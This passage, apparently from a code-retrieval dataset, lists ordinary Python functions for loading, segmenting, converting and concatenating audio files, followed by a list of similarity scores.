monaural file {path}\"\n )\n multiTrack[channel_names[0]] = Wave(value[:, np.newaxis], fs, path=path)\n if value.ndim == 2:\n\n if channel is None:\n multiTrack[channel_names[0]] = Wave(value[:, 0], fs, path=path)\n multiTrack[channel_names[1]] = Wave(value[:, 1], fs, path=path)\n else:\n try:\n multiTrack[channel_names[channel]] = Wave(\n value[:, channel], fs, path=path\n )\n except IndexError:\n raise MultiChannelError(\n f\"cannot select channel {channel} from file \"\n f\"{path} with {value.shape[1]} channels\"\n )\n\n for k in multiTrack.keys():\n value = multiTrack[k].value\n\n if np.issubdtype(value.dtype, np.integer):\n multiTrack[k].min = np.iinfo(value.dtype).min\n multiTrack[k].max = np.iinfo(value.dtype).max\n elif np.issubdtype(value.dtype, np.floating):\n multiTrack[k].min = -1.0\n multiTrack[k].max = 1.0\n else:\n logging.error(f\"Wave dtype {value.dtype} not supported\")\n raise NotImplementedError\n return multiTrack", "def segment_from_file(\n cls, audio_file, target_sr=None, n_segments=0, trim=False, orig_sr=None, channel_selector=None, offset=None\n ):\n is_segmented = False\n try:\n with sf.SoundFile(audio_file, 'r') as f:\n sample_rate = f.samplerate\n if target_sr is not None:\n n_segments_at_original_sr = math.ceil(n_segments * sample_rate / target_sr)\n else:\n n_segments_at_original_sr = n_segments\n\n if 0 < n_segments_at_original_sr < len(f):\n max_audio_start = len(f) - n_segments_at_original_sr\n if offset is None:\n audio_start = random.randint(0, max_audio_start)\n else:\n audio_start = math.floor(offset * sample_rate)\n if audio_start > max_audio_start:\n raise RuntimeError(\n f'Provided audio start ({audio_start}) is larger than the maximum possible ({max_audio_start})'\n 
)\n f.seek(audio_start)\n samples = f.read(n_segments_at_original_sr, dtype='float32')\n is_segmented = True\n elif n_segments_at_original_sr > len(f):\n logging.warning(\n f\"Number of segments ({n_segments_at_original_sr}) is greater than the length ({len(f)}) of the audio file {audio_file}. This may lead to shape mismatch errors.\"\n )\n samples = f.read(dtype='float32')\n else:\n samples = f.read(dtype='float32')\n except RuntimeError as e:\n logging.error(f\"Loading {audio_file} via SoundFile raised RuntimeError: `{e}`.\")\n raise e\n\n features = cls(\n samples, sample_rate, target_sr=target_sr, trim=trim, orig_sr=orig_sr, channel_selector=channel_selector\n )\n\n if is_segmented:\n features._samples = features._samples[:n_segments]\n\n return features", "def wavread(filename):\n\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\traise ValueError(\"Input file is wrong\")\n\n\tfs, x = read(filename)\n\n\tif (len(x.shape) !=1): # raise error if more than one channel\n x = np.mean(x,axis = 1)\n\t\tprint \"Audio file is stereo, converting to mono\"\n\n\t#scale down and convert audio into floating point number in range of -1 to 1\n\tx = np.float32(x)/norm_fact[x.dtype.name]\n\treturn fs, x", "def parse_mixer_file(filepath):\n logger = logging.getLogger(parse_mixer_file.__name__)\n mixer = list()\n with open(filepath, 'r') as mixer_file:\n for i,line in enumerate(mixer_file):\n\n line = line.strip()\n\n # A line looks like the following\n # <folder path> <number of trajectories>\n # If the second argument is not present, use all files in the folder indicated by -1\n\n # skip empty lines and lines starting with # are comments\n if len(line) == 0 or line[0] == '#':\n continue\n\n splits= line.split(' ')\n\n if len(splits) == 3:\n path = splits[0].strip()\n num_trajectories = int(splits[1])\n num_samples = int(splits[2])\n elif len(splits) == 2:\n path = splits[0].strip()\n num_trajectories = int(splits[1])\n num_samples = -1\n elif len(splits) == 1:\n path = splits[0].strip()\n num_trajectories = -1\n num_samples = -1\n else:\n raise ValueError('Invalid number of values in line {}: {}'.format(i+1,\n line.strip()))\n\n if num_trajectories < 0:\n logger.info('Take all files from {}'.format(path))\n else:\n logger.info('Take {} files from {}'.format(num_trajectories, path))\n\n mixer.append((path, num_trajectories, num_samples))\n\n if len(mixer) == 0:\n raise ValueError('Mixer file did not contain any valid element')\n\n return mixer", "def read(self, filename, normalize=True):\n if self.gcp == False:\n\n\t\t filepath = self.mixed_dir + filename\n\t\t sf, time_signal = wavfile.read(filepath, mmap=True)\n\n else:\n\n blob = list(self.bucket.list_blobs(prefix=filename))[0]\n # download blob as string\n file_as_string = blob.download_as_string()\n sf, time_signal = wavfile.read(io.BytesIO(file_as_string), mmap=True)\n\n\t\tif normalize == True:\n\t\t\t\n # normalization, assuming 2^15 is the highest possible quantization\n\t\t\ttime_signal = time_signal/np.power(2,15)\n\n\t\treturn time_signal", "def play_audio():\n directory = os.fsencode(MINI_PATH)\n print(directory)\n adp= []\n # lst = os.listdir(directory)\n # lst.sort()\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n #print(file)\n\n if filename.endswith(\".mp3\"): \n adp.append(MINI_PATH+filename)\n #print(adp)\n adp.sort()\n print(\"ADP: \", adp)\n x = \"|\".join(adp)\n print( f'concat:{x}')\n subprocess.call(['ffmpeg', '-i', f'concat:{x}', '-acodec', 'copy', RESULT_PATH])\n \n for file 
in os.listdir(directory):\n filename = os.fsdecode(file)\n print(filename)\n if filename.endswith(\".mp3\"):\n os.remove(MINI_PATH+filename)", "def __init__(self, audio_fname, good_range=None, **kwargs):\n # Some parameters\n self.sampling_rate = 44100 # This is essentia's default\n self.stroke_length = kwargs.get('stroke_length', 0.5) # In seconds\n self.clip_start = kwargs.get('clip_start', True) # In seconds\n self.clip_end = kwargs.get('clip_end', True) # In seconds\n\n # Getting the audio signal\n self.audio_fname = audio_fname\n # Following is an audio signal sampled in 44100Hz (essentia default)\n self.audio = MonoLoader(filename=audio_fname)()\n\n # Cleaning edges\n try:\n self.audio = self.audio[good_range[0]:good_range[1]]\n except:\n pass\n\n # clipping\n self.audio_thd = 0.05\n self.beginning_buffer = 1 # in seconds\n if self.clip_start:\n clipped_start = np.argmax(self.audio>self.audio_thd) - self.beginning_buffer*self.sampling_rate\n clipped_start = max(0, clipped_start)\n self.audio = self.audio[clipped_start:-1]\n\n if self.clip_end:\n reversed_audio = self.audio[::-1]\n clipped_end = len(reversed_audio) - np.argmax(reversed_audio>self.audio_thd) - 1 + self.beginning_buffer*self.sampling_rate\n self.audio = self.audio[:clipped_end]\n\n # Some parameter that will be defined by signal processing\n self.onset_times = False # In seconds\n self.onset_samples = False # As sample number in the audio sampling\n self.strokes = False\n self.stroke_df = False\n self.feature_table = False", "def compute_chunk_features(mp3_file):\n # Extract MP3 file to a mono, 10kHz WAV file\n sox_command = \"/usr/local/bin/sox\"\n out_file = 'temp.wav'\n #cmd = sox_command % (out_file, mp3_file)\n temp2 = subprocess.call([sox_command, mp3_file,'-r 10000','-c 1',out_file])\n # Read in chunks of data from WAV file\n wav_data1, wav_data2 = read_wav(out_file)\n # We'll cover how the features are computed in the next section!\n return np.array(features(wav_data1)), np.array(features(wav_data2))", "def read_wav(wav_file):\n w = wave.open(wav_file)\n n = 60 * 10000\n if w.getnframes() < n * 2:\n raise ValueError('Wave file too short')\n frames = w.readframes(n)\n wav_data1 = struct.unpack('%dh' % n, frames)\n frames = w.readframes(n)\n wav_data2 = struct.unpack('%dh' % n, frames)\n return wav_data1, wav_data2", "def load_times(file_name):\n data = np.loadtxt(file_name)\n data = data[data[:, 0].argsort()]\n times = data[:, 0]\n values = data[:, 1]\n\n # Remove the mean amplitude and shift time origin\n times -= times[0]\n values -= np.mean(values)\n\n return times, values", "def load_music_files():\n # Make a list of music files, right now it is done by collection all files\n # below the current folder whose extension starts with mp3/wav \n print('Loading music files...')\n for path, dirs, files in os.walk('.'):\n for file_ in files:\n file_path = os.path.relpath(os.path.join(path, file_))\n url_path = os.path.join(*[quote(part) for part in os.path.split(file_path)]) \n ext = os.path.splitext(file_)[1].lower()\n name = os.path.splitext(file_)[0].lower()\n key = ''.join(name.split()) # unique key - no spaces\n audio_file = None\n if ext.startswith('.mp3'):\n audio = MP3(file_path) \n audio_file = AudioFile(url_path, audio.info.length, name, key) \n if audio_file:\n music_files.append(audio_file)\n print('Found:', music_files[-1])", "def read_cospectrum(path,d):\r\n spec = []\r\n timeseries = []\r\n for i in range(len(d)):\r\n filename = path + d[i]\r\n\r\n with open(filename, \"r\") as f:\r\n reader = 
csv.reader(f,delimiter=',')\r\n ct=1\r\n for row in reader:\r\n if ct==6:\r\n Hz = float(row[0].split('_')[-1])\r\n elif ct==7:\r\n height = float(row[0].split('_')[-1])\r\n elif ct==8:\r\n ws = float(row[0].split('_')[-1])\r\n elif ct==9:\r\n avg_period = float(row[0].split('_')[-1])\r\n elif ct==13:\r\n header = row\r\n elif ct>13:\r\n break\r\n ct+=1\r\n \r\n meta = [Hz,height,ws,avg_period]\r\n \r\n thisspec = np.genfromtxt(filename,delimiter=',',skip_header=13)\r\n spec.append(thisspec)\r\n thistime = re.findall('\\d{8}-\\d{4}',filename)[0]\r\n thisdate = datetime.strptime(thistime,'%Y%m%d-%H%M')\r\n timeseries.append(thisdate) \r\n \r\n return spec, timeseries, header, meta", "def from_file(\n cls,\n audio_file,\n target_sr=None,\n int_values=False,\n offset=0,\n duration=0,\n trim=False,\n trim_ref=np.max,\n trim_top_db=60,\n trim_frame_length=2048,\n trim_hop_length=512,\n orig_sr=None,\n channel_selector=None,\n normalize_db=None,\n ref_channel=None,\n ):\n samples = None\n if isinstance(audio_file, list):\n return cls.from_file_list(\n audio_file_list=audio_file,\n target_sr=target_sr,\n int_values=int_values,\n offset=offset,\n duration=duration,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )\n\n if not isinstance(audio_file, str) or os.path.splitext(audio_file)[-1] in sf_supported_formats:\n try:\n with sf.SoundFile(audio_file, 'r') as f:\n dtype = 'int32' if int_values else 'float32'\n sample_rate = f.samplerate\n if offset > 0:\n f.seek(int(offset * sample_rate))\n if duration > 0:\n samples = f.read(int(duration * sample_rate), dtype=dtype)\n else:\n samples = f.read(dtype=dtype)\n except RuntimeError as e:\n logging.error(\n f\"Loading {audio_file} via SoundFile raised RuntimeError: `{e}`. \"\n f\"NeMo will fallback to loading via pydub.\"\n )\n\n if hasattr(audio_file, \"seek\"):\n audio_file.seek(0)\n\n if HAVE_PYDUB and samples is None:\n try:\n samples = Audio.from_file(audio_file)\n sample_rate = samples.frame_rate\n num_channels = samples.channels\n if offset > 0:\n # pydub does things in milliseconds\n seconds = offset * 1000\n samples = samples[int(seconds) :]\n if duration > 0:\n seconds = duration * 1000\n samples = samples[: int(seconds)]\n samples = np.array(samples.get_array_of_samples())\n # For multi-channel signals, channels are stacked in a one-dimensional vector\n if num_channels > 1:\n samples = np.reshape(samples, (-1, num_channels))\n except CouldntDecodeError as err:\n logging.error(f\"Loading {audio_file} via pydub raised CouldntDecodeError: `{err}`.\")\n\n if samples is None:\n libs = \"soundfile, and pydub\" if HAVE_PYDUB else \"soundfile\"\n raise Exception(f\"Your audio file {audio_file} could not be decoded. 
We tried using {libs}.\")\n\n return cls(\n samples,\n sample_rate,\n target_sr=target_sr,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )", "def on_media_loaded(self, event):\r\n if hasattr(self.mediactrl, \"DONTPLAY\"):\r\n delattr(self.mediactrl, \"DONTPLAY\")\r\n else:\r\n self.mediactrl.Play()\r\n data = self.data[self.text_id]\r\n index = data[\"filenames\"].index(data[\"current\"])\r\n self.gauge.SetValue(100.0 * (index + 1) / data[\"count\"])", "def play(sampler, name=\"/Users/Jxie0755/Documents/DXcodings/Learning_Python/CS_61A/week03/mario.wav\", seconds=2):\n out = open(name, \"wb\")\n out.setnchannels(1)\n out.setsampwidth(2)\n out.setframerate(frame_rate)\n t = 0\n while t < seconds * frame_rate:\n sample = sampler(t)\n out.writeframes(encode(sample))\n t = t + 1\n out.close()", "def load_tracks(self, data_dir, file_suffix):\n file_names = [x for x in self._list_data_files(data_dir, file_suffix)]\n print(f\"{file_suffix.upper()} files: {len(file_names)}\")\n\n tracks = []\n\n loaded_tracks = self._load_data_tracks(\n file_names, self.load_func_dict.get(file_suffix, load_gpx_file)\n )\n\n tracks.extend(loaded_tracks.values())\n log.info(f\"Conventionally loaded tracks: {len(loaded_tracks)}\")\n\n tracks = self._filter_tracks(tracks)\n\n # merge tracks that took place within one hour\n tracks = self._merge_tracks(tracks)\n # filter out tracks with length < min_length\n return [t for t in tracks if t.length >= self.min_length]" ]
[ "0.64271533", "0.6278708", "0.6274508", "0.6185571", "0.60926473", "0.6001208", "0.59411097", "0.59162825", "0.59099066", "0.5908874", "0.58851975", "0.58825463", "0.58139896", "0.5805803", "0.5801357", "0.57745636", "0.57619977", "0.5760922", "0.5745996", "0.56929225", "0.5692219", "0.56778324", "0.5647526", "0.56439734", "0.56117195", "0.56079024", "0.560788", "0.5599134", "0.55916727", "0.559097", "0.55789536", "0.5559803", "0.5558456", "0.5543562", "0.5533692", "0.5515577", "0.5490019", "0.5484649", "0.54649717", "0.54591066", "0.54588616", "0.54323167", "0.54288137", "0.5422587", "0.54215425", "0.5420751", "0.540456", "0.540219", "0.53962207", "0.5377127", "0.5376444", "0.5340699", "0.5335268", "0.53240365", "0.53170335", "0.5311564", "0.53107584", "0.53018224", "0.5295385", "0.52877766", "0.5285009", "0.52838016", "0.5282398", "0.52768", "0.5269239", "0.526842", "0.526669", "0.52657", "0.52647954", "0.5259704", "0.5258433", "0.5240021", "0.5235511", "0.5223285", "0.52225804", "0.522224", "0.5218797", "0.5217136", "0.5207983", "0.5207963", "0.52007574", "0.51864564", "0.5183331", "0.5179131", "0.5175417", "0.51732534", "0.5171615", "0.5171432", "0.51579154", "0.5157564", "0.51553404", "0.51533157", "0.5147174", "0.5144434", "0.5130418", "0.51296836", "0.512903", "0.51286095", "0.51157725", "0.511356" ]
0.62473094
3
Load an audio file and segment into 10s increments. Save each segment to the target directory. Append the gender of the speaker and the segment index to the filename.
def segment_audio(filename, y_value, split='train', clf='gender'):
    filepath = 'recordings/recordings/' + filename + '.mp3'
    audio, sr = librosa.load(filepath, sr=16000)
    audio = normalize(audio)

    # Add gender label to filename for later processing
    sex = y_value
    if sex == 'female':
        filename = '{}.F'.format(filename)
    else:
        filename = '{}.M'.format(filename)

    # Segment audio file
    seg_files = segment_10s(audio, sr)

    for key, val in seg_files.items():
        new_name = '{}.{}'.format(filename, key)
        sf.write('data/{}/{}/{}o.wav'.format(clf, split, new_name), val, sr)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def file_generator(files: list,\n segment_duration: float,\n sampleRate: int,\n db_thr: float or None = None,\n frame_length: int = 512,\n hop_length: int = 128,\n ) -> None:\n\n I = 0\n J = 0\n\n segment = np.zeros((int(segment_duration*sampleRate),))\n\n k = 0\n file_no = 0\n\n while True:\n if I >= len(segment):\n yield segment\n segment = np.zeros((int(segment_duration*sampleRate),))\n I = 0\n\n if k == 0 or J >= len(y):\n J = 0\n y, sr = librosa.core.load(files[file_no], mono=True, sr=sampleRate)\n file_no += 1\n\n if file_no == len(files):\n break\n\n # Normalize\n y = y/y.max()\n\n # Remix non-silent segments\n if db_thr is not None:\n # Figure out intervals of non-silence (NOTE: Is the threshold right? -- 60db quiet)\n intervals = librosa.effects.split(y, frame_length=frame_length, hop_length=hop_length, top_db=db_thr)\n\n # Remix according to those intervals\n y = librosa.effects.remix(y, intervals)\n\n if len(segment[I:]) >= len(y[J:]):\n segment[I:I+len(y[J:])] = y[J:]\n I = I + len(y[J:])\n J = J + len(y[J:])\n else:\n segment[I:] = y[J:J+len(segment[I:])]\n J = J + len(segment[I:])\n I = I + len(segment[I:])\n k += 1", "def process(filename, debug_mode=False):\n if debug_mode:\n global DO_REPORT\n DO_REPORT = debug_mode\n\n try:\n signal = preprocessing(filename)\n except BaseException as e:\n print(e)\n sys.exit()\n\n labels, num_of_speakers = diarization(signal)\n segments = lab2seg(labels)\n res_filename = create_csv(filename, segments)\n return res_filename, num_of_speakers", "def read_audio(audio_paths, speaker_dict, tool, config, normalize, is_training,\n save_path=None, save_format='numpy',\n global_mean_male=None, global_mean_female=None,\n global_std_male=None, global_std_female=None,\n dtype=np.float32):\n if not is_training:\n if global_mean_male is None or global_mean_female is None:\n raise ValueError('Set mean & std computed in the training set.')\n if normalize not in ['global', 'speaker', 'utterance', 'no']:\n raise ValueError(\n 'normalize must be \"utterance\" or \"speaker\" or \"global\" or \"no\".')\n if tool not in ['htk', 'python_speech_features', 'librosa']:\n raise TypeError(\n 'tool must be \"htk\" or \"python_speech_features\"' +\n ' or \"librosa\".')\n\n audio_path_list_male, audio_path_list_female = [], []\n total_frame_num_male, total_frame_num_female = 0, 0\n total_frame_num_dict = {}\n speaker_mean_dict = {}\n\n # NOTE: 講演ごとに異なるspeakerとみなす\n\n # Loop 1: Computing global mean and statistics\n if is_training and normalize != 'no':\n print('=====> Reading audio files...')\n for i, audio_path in enumerate(tqdm(audio_paths)):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio file into utterances\n _, input_utt_sum, speaker_mean, _, total_frame_num_speaker = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n if i == 0:\n # Initialize global statistics\n feature_dim = input_utt_sum.shape[0]\n global_mean_male = np.zeros((feature_dim,), dtype=dtype)\n global_mean_female = np.zeros(\n (feature_dim,), dtype=dtype)\n global_std_male = np.zeros((feature_dim,), dtype=dtype)\n global_std_female = np.zeros((feature_dim,), dtype=dtype)\n\n # For computing global mean\n if speaker[3] == 'M':\n audio_path_list_male.append(audio_path)\n global_mean_male += input_utt_sum\n total_frame_num_male += total_frame_num_speaker\n elif speaker[3] == 'F':\n audio_path_list_female.append(audio_path)\n global_mean_female += input_utt_sum\n total_frame_num_female += 
total_frame_num_speaker\n else:\n raise ValueError\n\n # For computing speaker stddev\n if normalize == 'speaker':\n speaker_mean_dict[speaker] = speaker_mean\n total_frame_num_dict[speaker] = total_frame_num_speaker\n # NOTE: speaker mean is already computed\n\n print('=====> Computing global mean & stddev...')\n # Compute global mean per gender\n global_mean_male /= total_frame_num_male\n global_mean_female /= total_frame_num_female\n\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, _, _, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n # For computing global stddev\n if speaker[3] == 'M':\n for input_utt in input_data_dict_speaker.values():\n global_std_male += np.sum(\n np.abs(input_utt - global_mean_male) ** 2, axis=0)\n elif speaker[3] == 'F':\n for input_utt in input_data_dict_speaker.values():\n global_std_female += np.sum(\n np.abs(input_utt - global_mean_female) ** 2, axis=0)\n else:\n raise ValueError\n\n # Compute global stddev per gender\n global_std_male = np.sqrt(\n global_std_male / (total_frame_num_male - 1))\n global_std_female = np.sqrt(\n global_std_female / (total_frame_num_female - 1))\n\n if save_path is not None:\n # Save global mean & std per gender\n np.save(join(save_path, 'global_mean_male.npy'),\n global_mean_male)\n np.save(join(save_path, 'global_mean_female.npy'),\n global_mean_female)\n np.save(join(save_path, 'global_std_male.npy'),\n global_std_male)\n np.save(join(save_path, 'global_std_female.npy'),\n global_std_female)\n\n # Loop 2: Normalization and Saving\n print('=====> Normalization...')\n frame_num_dict = {}\n sampPeriod, parmKind = None, None\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n if normalize == 'speaker' and is_training:\n speaker_mean = speaker_mean_dict[speaker]\n else:\n speaker_mean = None\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, speaker_mean, speaker_std, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=is_training,\n sil_duration=0,\n tool=tool,\n config=config,\n mean=speaker_mean) # for compute speaker sttdev\n # NOTE: input_data_dict_speaker have been not normalized yet\n\n for utt_index, input_utt in input_data_dict_speaker.items():\n\n if normalize == 'no':\n pass\n elif normalize == 'global' or not is_training:\n # Normalize by mean & std over the training set per gender\n if speaker[3] == 'M':\n input_utt -= global_mean_male\n input_utt /= global_std_male\n elif speaker[3] == 'F':\n input_utt -= global_mean_female\n input_utt /= global_std_female\n else:\n raise ValueError\n elif normalize == 'speaker':\n # Normalize by mean & std per speaker\n input_utt = (input_utt - speaker_mean) / speaker_std\n elif normalize == 'utterance':\n # Normalize by mean & std per utterance\n utt_mean = np.mean(input_utt, axis=0, dtype=dtype)\n utt_std = np.std(input_utt, axis=0, dtype=dtype)\n input_utt = (input_utt - utt_mean) / utt_std\n else:\n raise ValueError\n\n frame_num_dict[speaker + '_' + utt_index] = input_utt.shape[0]\n\n if save_path is not None:\n # Save input features\n if save_format == 'numpy':\n input_data_save_path = mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.npy')\n np.save(input_data_save_path, input_utt)\n elif save_format == 'htk':\n if sampPeriod is None:\n _, sampPeriod, parmKind = read(audio_path)\n 
write(input_utt,\n htk_path=mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.htk'),\n sampPeriod=sampPeriod,\n parmKind=parmKind)\n else:\n raise ValueError('save_format is numpy or htk.')\n\n if save_path is not None:\n # Save the frame number dictionary\n with open(join(save_path, 'frame_num.pickle'), 'wb') as f:\n pickle.dump(frame_num_dict, f)\n\n return (global_mean_male, global_mean_female,\n global_std_male, global_std_female, frame_num_dict)", "def read_audio(audio_paths, speaker_dict, tool, config, normalize, is_training,\n save_path=None,\n train_global_mean_male=None, train_global_mean_female=None,\n train_global_std_male=None, train_global_std_female=None,\n dtype=np.float64):\n if not is_training:\n if train_global_mean_male is None or train_global_mean_female is None:\n raise ValueError('Set mean & std computed in the training set.')\n if normalize not in ['global', 'speaker', 'utterance']:\n raise ValueError('normalize is \"utterance\" or \"speaker\" or \"global\".')\n\n audio_path_list_male, audio_path_list_female = [], []\n total_frame_num_male, total_frame_num_female = 0, 0\n total_frame_num_dict = {}\n speaker_mean_dict = {}\n\n # NOTE: speaker norm は講演ごとの正規化とする\n # 講演間の話者関係がわからないから\n\n # Loop 1: Computing global mean and statistics\n if is_training:\n print('===> Reading audio files...')\n for i, audio_path in enumerate(tqdm(audio_paths)):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio file into utterances\n _, input_data_utt_sum, speaker_mean, _, total_frame_num_speaker = segment_htk(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n if i == 0:\n # Initialize global statistics\n feature_dim = input_data_utt_sum.shape[0]\n train_global_mean_male = np.zeros((feature_dim,), dtype=dtype)\n train_global_mean_female = np.zeros(\n (feature_dim,), dtype=dtype)\n train_global_std_male = np.zeros((feature_dim,), dtype=dtype)\n train_global_std_female = np.zeros((feature_dim,), dtype=dtype)\n\n # For computing global mean\n if speaker[3] == 'M':\n audio_path_list_male.append(audio_path)\n train_global_mean_male += input_data_utt_sum\n total_frame_num_male += total_frame_num_speaker\n elif speaker[3] == 'F':\n audio_path_list_female.append(audio_path)\n train_global_mean_female += input_data_utt_sum\n total_frame_num_female += total_frame_num_speaker\n else:\n raise ValueError\n\n # For computing speaker stddev\n if normalize == 'speaker':\n speaker_mean_dict[speaker] = speaker_mean\n total_frame_num_dict[speaker] = total_frame_num_speaker\n # NOTE: すでに話者平均は計算できている\n\n print('===> Computing global mean & stddev...')\n # Compute global mean per gender\n train_global_mean_male /= total_frame_num_male\n train_global_mean_female /= total_frame_num_female\n\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, _, _, _ = segment_htk(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n # For computing global stddev\n if speaker[3] == 'M':\n for input_data_utt in input_data_dict_speaker.values():\n train_global_std_male += np.sum(\n np.abs(input_data_utt - train_global_mean_male) ** 2, axis=0)\n elif speaker[3] == 'F':\n for input_data_utt in input_data_dict_speaker.values():\n train_global_std_female += np.sum(\n np.abs(input_data_utt - train_global_mean_female) ** 2, axis=0)\n else:\n raise ValueError\n\n # 
Compute global stddev per gender\n train_global_std_male = np.sqrt(\n train_global_std_male / (total_frame_num_male - 1))\n train_global_std_female = np.sqrt(\n train_global_std_female / (total_frame_num_female - 1))\n\n if save_path is not None:\n # Save global mean & std per gender\n np.save(join(save_path, 'train_global_mean_male.npy'),\n train_global_mean_male)\n np.save(join(save_path, 'train_global_mean_female.npy'),\n train_global_mean_female)\n np.save(join(save_path, 'train_global_std_male.npy'),\n train_global_std_male)\n np.save(join(save_path, 'train_global_std_female.npy'),\n train_global_std_female)\n\n # Loop 2: Normalization and Saving\n print('===> Normalization...')\n frame_num_dict = {}\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n if normalize == 'speaker' and is_training:\n speaker_mean = speaker_mean_dict[speaker]\n else:\n speaker_mean = None\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, speaker_mean, speaker_std, _ = segment_htk(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=is_training,\n sil_duration=0,\n tool=tool,\n config=config,\n mean=speaker_mean) # for compute speaker sttdev\n # NOTE: input_data_dict_speaker have been not normalized yet\n\n for utt_index, input_data_utt in input_data_dict_speaker.items():\n\n if normalize == 'utterance' and is_training:\n # Normalize by mean & std per utterance\n utt_mean = np.mean(input_data_utt, axis=0, dtype=dtype)\n utt_std = np.std(input_data_utt, axis=0, dtype=dtype)\n input_data_utt = (input_data_utt - utt_mean) / utt_std\n\n elif normalize == 'speaker' and is_training:\n # Normalize by mean & std per speaker\n input_data_utt = (input_data_utt - speaker_mean) / speaker_std\n\n else:\n # Normalize by mean & std over the training set per gender\n if speaker[3] == 'M':\n input_data_utt -= train_global_mean_male\n input_data_utt /= train_global_std_male\n elif speaker[3] == 'F':\n input_data_utt -= train_global_mean_female\n input_data_utt /= train_global_std_female\n else:\n raise ValueError\n\n if save_path is not None:\n # Save input features\n input_data_save_path = mkdir_join(\n save_path, speaker + '_' + utt_index + '.npy')\n np.save(input_data_save_path, input_data_utt)\n frame_num_dict[speaker + '_' +\n utt_index] = input_data_utt.shape[0]\n\n if save_path is not None:\n # Save the frame number dictionary\n with open(join(save_path, 'frame_num.pickle'), 'wb') as f:\n pickle.dump(frame_num_dict, f)\n\n return (train_global_mean_male, train_global_mean_female,\n train_global_std_male, train_global_std_female)", "def __save(self,audio):\n self.__openSampleFile()\n self.__sampleFile.writeframes(audio)", "def generate_seg_file(self, filename):\n self._generate_a_seg_file(filename, self.wave[:-4])", "def segment(sound_file, spec_file, ms_step, pix_per_s, sound_output_dir, spec_output_dir):\n pix_per_ms = pix_per_s/1000\n sound = AudioSegment.from_wav(sound_file)\n start, stop = 0, ms_step\n start_pixel, stop_pixel = start*pix_per_ms, stop*pix_per_ms\n spec = Image.open(spec_file)\n chopping = True\n while stop <= len(sound):\n \n # Split sound\n chunk = sound[start:stop]\n chunk.export(sound_output_dir + sound_file.split(\"/\")[-1].split(\".\")[0] + \"_\" + str(start) + \"-\" + str(stop) + \".wav\", format=\"wav\")\n\n # Split spectrogram\n w, h = spec.size\n cropped_spec = spec.crop((start_pixel, 0, stop_pixel, h))\n cropped_spec.save(spec_output_dir + sound_file.split(\"/\")[-1].split(\".\")[0] + \"_\" + str(start) + \"-\" + 
str(stop) + \".png\")\n\n start += ms_step\n stop += ms_step\n start_pixel, stop_pixel = start*pix_per_ms, stop*pix_per_ms", "def set_fname_encoder(self):\n\n fp = open(self.meta_path, 'r')\n wav_names = []\n next(fp)\n for i, line in tqdm(enumerate(fp)):\n audio_name, _, _, _ = line.split()\n wav_name = os.path.basename(audio_name)\n wav_names.append(wav_name)\n self.fname_encoder.fit(wav_names)", "def diarization(self):\n self._status = 1\n if self._single:\n try:\n os.mkdir(self.get_file_basename())\n except OSError, err:\n if err.errno != 17:\n raise err\n fm._silence_segmentation(self._basename)\n fm._gender_detection(self._basename)\n segname = self._basename + '.seg'\n f_seg = open(segname, 'r')\n headers = []\n values = []\n differ = False\n basic = None\n gen = {'M': 0, 'F': 0, 'U': 0}\n for line in f_seg.readlines():\n if line.startswith(';;'):\n headers.append(line[line.index('['):])\n else:\n a_line = line.split(' ')\n if basic == None:\n basic = a_line[4]\n if a_line[4] != basic:\n differ = True\n gen[a_line[4]] += int(a_line[3])\n values.append(a_line)\n header = \";; cluster:S0 %s\" % headers[0]\n from operator import itemgetter\n index = 0\n while index < len(values):\n values[index][2] = int(values[index][2])\n index += 1\n values = sorted(values, key=itemgetter(2))\n index = 0\n while index < len(values):\n values[index][2] = str(values[index][2])\n index += 1\n newfile = open(segname + '.tmp', 'w')\n newfile.write(header)\n if differ: #in case the gender of the single segments differ \n# then set the prevailing\n# print 'transgender :-D'\n if gen[ 'M' ] > gen[ 'F' ]:\n basic = 'M'\n elif gen[ 'M' ] < gen[ 'F' ] :\n basic = 'F'\n else:\n basic = 'U'\n\n for line in values:\n line[4] = basic #same gender for all segs\n newfile.write(' '.join(line[:-1]) + ' S0\\n')\n f_seg.close()\n newfile.close()\n shutil.copy(self.get_file_basename() + '.wav',\n os.path.join(self.get_file_basename(), 'S0' + '.wav'))\n shutil.move(segname + '.tmp', segname)\n shutil.copy(self.get_file_basename() + '.seg',\n os.path.join(self.get_file_basename(), 'S0' + '.seg'))\n utils.ensure_file_exists(segname)\n else:\n# print str(self._diar_conf[0])\n# print str(self._diar_conf[1])\n fm.diarization(self._basename, str(self._diar_conf[0]),\n str(self._diar_conf[1]))\n self._status = 2", "def 